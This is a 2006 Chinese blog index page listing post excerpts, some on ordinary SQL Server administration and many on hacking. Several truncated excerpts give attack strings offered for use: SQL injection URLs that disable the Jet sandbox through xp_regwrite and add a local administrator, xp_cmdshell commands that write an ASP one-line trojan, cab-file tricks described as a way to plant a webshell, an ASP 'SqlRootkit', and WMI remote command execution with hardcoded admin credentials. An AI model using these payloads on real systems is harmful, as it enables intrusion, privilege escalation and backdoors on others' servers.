- 博客(16)
- 收藏
- 关注
原创 NBSI2内部功能实现大揭谜
作者:虚空 来自:www.csdn.net前段时间SQL注入很流行,用过小竹的NB2的人可能都知道,这个工具接近无敌,菜鸟用了它也能数秒把一个站给黑了,但是不了解其中的注入过程 可以说永远都进步不了吧~~首先声明,我也只是菜鸟一个,正好最近在研究SQL,随便把NB2的注入过程给研究了一个,所用工具wse,相信大家不会陌生的,网上到处有得下,我给一个地址,_blank>http://www.gxgl
2006-01-28 03:05:00 991
原创 关于无法安装sql server的解决办法
安装sql server时出现如下提示“以前的某个程序安装已在安装计算机上创建挂起的文件操作。运行安装程序之前必须重新启动计算机”错误。无法进行下去。 打开注册表编辑器,在HKEY_LOCAL_MACHINE/SYSTEM/CurrentControlSet/Control/Session Manager中找到PendingFileRenameOperations项目,并删除它。这样就可以清除
2006-01-28 02:37:00 2108 2
原创 Do All in Cmd Shell (一切尽在命令行)
Do All in Cmd Shell (一切尽在命令行)-------------------------------------------------------zzzEVAzzz http://www.isgrey.com2004-04-24-------------------------------------------------------目录1,前言2,文件传输3,系统配置4,
2006-01-26 23:27:00 1128
原创 难道真的那么不顺吗?
2006年开始了? 刚开始就那么不顺......难道一年都如此? 不可能! 呵呵! 人已天斗其乐无穷......来吧! 我等着你!ps:硬盘全部数据丢失! 恢复中...
2006-01-19 20:15:00 699
原创 命令行下执行sql server语句
isql -E -s 127.0.0.1 /U alma /P /i c:/sql.sql sql.sql 包含sql语句! 详细请查看sql server联机帮助
2006-01-17 07:24:00 1317
原创 取得表结构详细信息的SQL 语句
--查询表结构信息--邹老大的SELECT 表名=case when a.colorder=1 then d.name else end,表说明=case when a.colorder=1 then isnull(f.value,) else end,字段序号=a.colorder,字段名=a.name,标识=case when COLUMNPROPERTY( a.id,a.na
2006-01-15 07:33:00 853
原创 交换网络中的嗅探和ARP欺骗
很老的文章了,但对深入了解网络协议,分析原理有很大帮助。以太网内的嗅探(sniff)对于网络安全来说并不是什么好事,虽然对于网络管理员能够跟踪数据包并且发现网络问题,但是如果被破坏者利用的话,就对整个网络构成严重的安全威胁。至于嗅探的好处和坏处就不罗嗦了。ARP缓存表假设这样一个网络:——————————| HUB |——————————| | | | | | | | | HostA
2006-01-13 20:24:00 800
原创 2005过去了.
2005过去了.! 总结一下! 先来看行程4月份南宁到-成都-峨眉山5月份峨眉山-雅安6月份雅安-成都7月份成都-雅安-成都-南宁8月份南宁-成都-雅安9月份雅安-西安-北京-天津10月份雅安-成都11月份成都-巴中12月份成都-上海到处漂泊.....那里才是我的家??2006年会怎样?
2006-01-13 16:58:00 622
原创 asp使用wmi远程执行命令
文章作者:xiaolu[BST]信息来源:邪恶八进制信息安全团队(www.eviloctal.com)set ww=server.createobject("wbemscripting.swbemlocator")set cc=ww.connectserver("192.168.2.1","root/cimv2","administrator","xiaolu")set ss=cc.get("Wi
2006-01-13 02:08:00 841
原创 深入挖掘Windows脚本技术
深入挖掘Windows脚本技术-------------------------------------------------------zzzEVAzzz http://www.ph4nt0m.org2004-11-18-------------------------------------------------------【目录】1,前言2,回顾WSH对象3,WMI服务4,脚本也有GUI
2006-01-11 21:24:00 1254
原创 3个MSSQL扩展
转自:http://www.ph4nt0m.org/作者:superheiEXEC [master].[dbo].[xp_makecab] c:/test.rar,default,1,d:/cmd.asp打包EXEC [master].[dbo].[xp_unpackcab] C:/test.rar,c:,1, n.asp解包,可以用于得到webshellEXEC [mas
2006-01-11 15:16:00 1120
原创 整理的一些有用的ASP注入相关的命令 BY pt007&solaris7
整理的一些有用的ASP注入相关的命令 BY pt007&solaris7大家好 ,我们是pt007和solaris7,QQ:7491805/564935,欢迎高手前来交流:)。1、 用^转义字符来写ASP(一句话木马)文件的方法: http://192.168.1.5/display.asp?keyno=1881;exec master.dbo.xp_cmdshell echo ^execut
2006-01-11 15:02:00 2849
原创 SqlRootkit - by jnc
<!--if session("login")="" then response.write "no login" else response.write "login in"end if response.write "exit login"--><!--If r
2006-01-11 14:52:00 901
原创 利用access执行命令的一个实例
;exec%20master..xp_regwrite%20HKEY_LOCAL_MACHINE,SOFTWARE/Microsoft/Jet/4.0/Engines,SandBoxMode,REG_DWORD,0;--%20and%200%20and%200net%20localgroup%20administrators%20l0g%20/add %20and%200
2006-01-11 01:01:00 966
原创 搜索字符串所在的表和字段
declare @str varchar(100)set @str=l0g --要搜索的字符串declare @s varchar(8000)declare tb cursor local forselect s=if exists(select 1 from [+b.name+] where [+a.name+] like %+@str+%) print 所在的表
2006-01-11 00:48:00 760
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人